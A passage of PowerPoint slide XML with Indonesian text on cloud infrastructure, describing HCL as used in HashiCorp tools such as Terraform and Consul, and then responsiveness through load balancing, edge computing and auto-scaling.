              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> JSON dan YAML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sintaksis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. HCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>variabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sintaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. HCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Terraform dan Consul.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Daya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfluktuasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Mendistribusikan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> back-end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alih-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdistribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
